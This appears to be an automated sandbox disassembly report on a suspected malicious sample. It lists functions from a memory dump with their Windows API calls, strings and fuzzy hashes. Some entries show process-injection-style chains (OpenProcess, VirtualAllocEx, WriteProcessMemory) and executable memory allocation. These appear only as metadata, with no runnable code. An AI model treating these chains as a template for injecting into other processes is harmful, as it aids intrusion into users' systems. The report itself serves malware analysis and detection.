Instruction ID: 40cd1d48ae2ca625281419d7a0583d6da62c289d5c1b836bf31ab33c7529d935
Opcode Fuzzy Hash: 3fa2093aae5f87531891c54207164c121c4586b5ff4811f9aa3e48f01a9ea2bd
Instruction Fuzzy Hash: 4F91CC71108301DFCB14FF24D899D6EB7A8EF89744F40491DF486972A1EA38EE05CB92

Function 0079523D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 007952CD

Part of subcall function 007A0320: __87except.LIBCMT ref: 007A035B

Strings

pow, xrefs: 007952A5, 007952C2

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: aca4168c297b6af11cd52e876542129f7608ff5c901b624b2a9c1eee93d765d5
Instruction ID: ffdebdd76f4207e488134fb75fb8f638f7ac6bda2625de3d9f7708d224628484
Opcode Fuzzy Hash: aca4168c297b6af11cd52e876542129f7608ff5c901b624b2a9c1eee93d765d5
Instruction Fuzzy Hash: 3B518C61E09A01C7CF12B724E95137A3BA0BB87750F304E58E4C1862E5EE7C8CD49BC6

Function 00790654 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON

Download Yara Rule

Strings

#, xrefs: 00790699
+, xrefs: 00790690

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID:
String ID: #$+
API String ID: 0-2552117581
Opcode ID: 53431f707e4e743c5af93c9fc8c9168bf8b4e3af0f4940d61751432cde7b9a24
Instruction ID: e9d388bd4bae27c0b7b2864b32ca8602c447a7cc74a7fd3c139f19ed60f1f966
Opcode Fuzzy Hash: 53431f707e4e743c5af93c9fc8c9168bf8b4e3af0f4940d61751432cde7b9a24
Instruction Fuzzy Hash: 43511075500246CFDF15EF68D884AFA7BE4EF55320F14005DE892AB290D738AC82CBA1

Function 0077E7F7 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0077E937
_memmove.LIBCMT ref: 0077E9D0
_free.LIBCMT ref: 0077E9F6
_memmove.LIBCMT ref: 0077EAA9

Strings

#Vx, xrefs: 0077E9E2

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: _memmove$_free
String ID: #Vx
API String ID: 2620147621-2004165239
Opcode ID: 00d745daa818616367f17d9b658eac23f5ffc2e1f0c627f641b46ae1ad47117b
Instruction ID: 37f500301ea41083e7901a2f80b901224e330880262bec80003f40fb833077d4
Opcode Fuzzy Hash: 00d745daa818616367f17d9b658eac23f5ffc2e1f0c627f641b46ae1ad47117b
Instruction Fuzzy Hash: 0E5159716087419FDB24CF28C481B6BBBE5BF89354F05896DE98987361E739E801CB92

Function 0078CF0C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0078CFC2
_memmove.LIBCMT ref: 0078D060
_memset.LIBCMT ref: 0078D084

Strings

ERCP, xrefs: 0078CF2D

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: _memset$_memmove
String ID: ERCP
API String ID: 2532777613-1384759551
Opcode ID: 4b9a67a2441beb51d484143927d310a28b787ac90eb3d13e01c6a83abead0beb
Instruction ID: 42fb56e5c62adaccd3ca3c04dd9c533377c3a08db1b4b67d7b9bea7357a9d5c2
Opcode Fuzzy Hash: 4b9a67a2441beb51d484143927d310a28b787ac90eb3d13e01c6a83abead0beb
Instruction Fuzzy Hash: B451D4B1940309DBDB34DF65C885BAABBF8EF04310F14856EE94ADB281E738D985CB50

Function 007CA3AD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON

Download Yara Rule

APIs

Part of subcall function 007D1CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007C9E4E,?,?,00000034,00000800,?,00000034), ref: 007D1CE5

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 007CA3F7

Part of subcall function 007D1C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007C9E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 007D1CB0

Part of subcall function 007D1BDD: GetWindowThreadProcessId.USER32(?,?), ref: 007D1C08
Part of subcall function 007D1BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,007C9E12,00000034,?,?,00001004,00000000,00000000), ref: 007D1C18
Part of subcall function 007D1BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,007C9E12,00000034,?,?,00001004,00000000,00000000), ref: 007D1C2E

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 007CA464
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 007CA4B1

Strings

@, xrefs: 007CA4C9

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 199dee96d8d1bd405df6f889e44c5a079805cd121c6fa7aa4f2786b179002c6d
Instruction ID: 8f1f16c0b0b24227ae75922174f510a81c5ae0b95b8b47763115278a4b9c06e1
Opcode Fuzzy Hash: 199dee96d8d1bd405df6f889e44c5a079805cd121c6fa7aa4f2786b179002c6d
Instruction Fuzzy Hash: 4A412B7294021CBFDB14DBA4CD89FDEBBB8AF45300F004199FA55A7280DA756E45CBA1

Function 007F79FE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 007F7A86
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 007F7A9A
SendMessageW.USER32(?,00001002,00000000,?), ref: 007F7ABE

Strings

SysMonthCal32, xrefs: 007F7A51

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: a2a4274df0e3d9348bb86919dc5af231db6a719cd860f0f1c37bfb7b23197bb3
Instruction ID: 7f8ef58e1ae858985d48ba11ee2c6257df6cda74602b03b2eaea8800f96715a4
Opcode Fuzzy Hash: a2a4274df0e3d9348bb86919dc5af231db6a719cd860f0f1c37bfb7b23197bb3
Instruction Fuzzy Hash: 7321803261021DABDF158E54CC86FEE3B69EB48714F124214FF156B290DA75A851DBA0

Function 007F81B8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 007F826F
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 007F827D
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 007F8284

Strings

msctls_updown32, xrefs: 007F81E9

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 39f85e46cc72f6a406d49e85a64987abb11bf803a5dcdfd51e7792424f18a8c2
Instruction ID: 541886a29d7c8f606390f6cbbfee19ff7462537d608af01f45881efd92c8235b
Opcode Fuzzy Hash: 39f85e46cc72f6a406d49e85a64987abb11bf803a5dcdfd51e7792424f18a8c2
Instruction Fuzzy Hash: 29218BB160420CAFDB50DF58CC85DB737ADFB9A394B080559FA109B351CB35EC11CAA1

Function 007F72D5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 007F7360
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 007F7370
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 007F7395

Strings

Listbox, xrefs: 007F732D

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: b1dbf78c3746b217782ad09fb1e071c81ddbf847923b9dfd7639432536d48b00
Instruction ID: 453fe0f061146c0e929433b038223514bef37dbd3456ce7fcda13e4557034629
Opcode Fuzzy Hash: b1dbf78c3746b217782ad09fb1e071c81ddbf847923b9dfd7639432536d48b00
Instruction Fuzzy Hash: 4A21CC32604118BFDF168F54CC85EBF37AAEF89764F118124FA149B290CA75AC51DBA0

Function 007F7D33 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 007F7D97
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 007F7DAC
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 007F7DB9

Strings

msctls_trackbar32, xrefs: 007F7D6E

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: d52ced662c766d2d06c2cf4fd9fd95f26b7076bbf5998e4e533318b5e22f1975
Instruction ID: 51fdc231255e4817c71f642893ce2581042278256d0cf37441170dbcc95e791b
Opcode Fuzzy Hash: d52ced662c766d2d06c2cf4fd9fd95f26b7076bbf5998e4e533318b5e22f1975
Instruction Fuzzy Hash: B211017220420CBADF249E64CC05FFB3BA9EF88B14F114518FB50A6190D6769811DB20

Function 00784B77 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00784B44,?,007849D4,?,?,007827AF,?,00000001), ref: 00784B85
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00784B97

Strings

Wow64DisableWow64FsRedirection, xrefs: 00784B91
kernel32.dll, xrefs: 00784B80

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 9b7d6b496cb549bbe992b3e1d0f0cb0f9c1e5ee4c434afe68d0768ff2bbdef38
Instruction ID: 0cea723b86fed6c32d78db08ddfec1fb9084667129994cdf1f5a168d77be8704
Opcode Fuzzy Hash: 9b7d6b496cb549bbe992b3e1d0f0cb0f9c1e5ee4c434afe68d0768ff2bbdef38
Instruction Fuzzy Hash: 28D017B15557238FE721AF76EC18B067AE4BF05351F11882AD496E2690EAB8E880CB50

Function 00784BAA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00784AF7,?), ref: 00784BB8
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00784BCA

Strings

Wow64RevertWow64FsRedirection, xrefs: 00784BC4
kernel32.dll, xrefs: 00784BB3

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 7a7e62e3900ee16bef432e75afc1776080e71b9f1de72285bd4a149bd1a7e932
Instruction ID: 2fae4dabb900f4658f7fbb9c223e82081e86bcac2dda5aef91ed051fde4746e1
Opcode Fuzzy Hash: 7a7e62e3900ee16bef432e75afc1776080e71b9f1de72285bd4a149bd1a7e932
Instruction Fuzzy Hash: 0CD017B05547238FEB20AF75EC08B067AE5BF05351F119C6AD496D2A94EAB8D880CB50

Function 007F1447 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,007F1696), ref: 007F1455
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 007F1467

Strings

advapi32.dll, xrefs: 007F1450
RegDeleteKeyExW, xrefs: 007F1461

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: 933416adf2e7777c635ec0db6a71a758f49b0751e46e8e782034576b415b0f51
Instruction ID: 4818c3445123f9efc58cd8af426533fd17e2c98c7872bd2508393ad0485e0992
Opcode Fuzzy Hash: 933416adf2e7777c635ec0db6a71a758f49b0751e46e8e782034576b415b0f51
Instruction Fuzzy Hash: F0D01730521722CFE7209F75D80972A76E4FF56395F11C82A94E6D22A0EB78D8C0CB50

Function 007855F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00785E3D), ref: 007855FE
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00785610

Strings

GetNativeSystemInfo, xrefs: 0078560A
kernel32.dll, xrefs: 007855F9

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 995963619c0270bb390f736bfa4acab92d1dbf669ef8c9e1951f35d6677c6da2
Instruction ID: 8d5b93e7c29d4c800e541c8b0cbc05b168a624ac0367de7f88f4f9d62c7fa1db
Opcode Fuzzy Hash: 995963619c0270bb390f736bfa4acab92d1dbf669ef8c9e1951f35d6677c6da2
Instruction Fuzzy Hash: 33D01774AA1B12CFE760AF75CC087167AE5BF05755F11882AD496D2291EA78C880CF90

Function 007E97CA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,007E93DE,?,00800980), ref: 007E97D8
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 007E97EA

Strings

GetModuleHandleExW, xrefs: 007E97E4
kernel32.dll, xrefs: 007E97D3

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 6d17d1718afc4aec347700b4909c47c0abbf243cd7eafc60d841c56a433baedd
Instruction ID: d4e06c467068833296e1bc5c39c108e2234382ffdfc6845fc93cd3a57ebe18e6
Opcode Fuzzy Hash: 6d17d1718afc4aec347700b4909c47c0abbf243cd7eafc60d841c56a433baedd
Instruction Fuzzy Hash: E4D012715117138FD7205F75DC8870676D4FF09391F11882AD895D2250EB78D480CA51

Function 007C7D9B Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4286ee316b0787a702c8bbdd6e694dae37b491087a0e77c47a0a410dc5354fcb
Instruction ID: 2d392e8aae7c5d4d6d6cb9cc489a65b72b02e31ec950f9be26d9576870e58ee4
Opcode Fuzzy Hash: 4286ee316b0787a702c8bbdd6e694dae37b491087a0e77c47a0a410dc5354fcb
Instruction Fuzzy Hash: F0C16D75A0021AEFCB18CF98C884EAEB7B5FF48714B11859CE805EB251DB35ED81DB91

Function 007EE713 Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 007EE7A7
CharLowerBuffW.USER32(?,?), ref: 007EE7EA

Part of subcall function 007EDE8E: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 007EDEAE

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 007EE9EA
_memmove.LIBCMT ref: 007EE9FD

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: 77923a487e2c8f4b95116bf0deec622a9dddd8c92e43402f07e29b0c3f51cd13
Instruction ID: e765216ec4f9ca4a607e7403709aa41e0fe0af70c1cbfb3e1eed6b7b4bd4d1a6
Opcode Fuzzy Hash: 77923a487e2c8f4b95116bf0deec622a9dddd8c92e43402f07e29b0c3f51cd13
Instruction Fuzzy Hash: CAC16871A08341CFC714DF29C48496ABBE4FF89714F04896EF8999B351D739E946CB82

Function 007E877D Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 007E87AD
CoUninitialize.OLE32 ref: 007E87B8

Part of subcall function 007FDF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,007E8A0E,?,00000000), ref: 007FDF71

VariantInit.OLEAUT32(?), ref: 007E87C3
VariantClear.OLEAUT32(?), ref: 007E8A94

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 020c6e24e31eb45d776522cf0f8295ddad34d43f526099bc2ed678c35ff53a46
Instruction ID: 1172dac1823723ed9e4799e26140a218ea4e968bf1f9e792f7d7c88971ee276d
Opcode Fuzzy Hash: 020c6e24e31eb45d776522cf0f8295ddad34d43f526099bc2ed678c35ff53a46
Instruction Fuzzy Hash: 72A15875604B41DFCB50DF25C485B2AB7E5BF88354F148859FA999B3A2CB38ED00CB92

Function 007C814E Relevance: 6.2, APIs: 4, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00803C4C,?), ref: 007C8308
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00803C4C,?), ref: 007C8320
CLSIDFromProgID.OLE32(?,?,00000000,00800988,000000FF,?,00000000,00000800,00000000,?,00803C4C,?), ref: 007C8345
_memcmp.LIBCMT ref: 007C8366

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
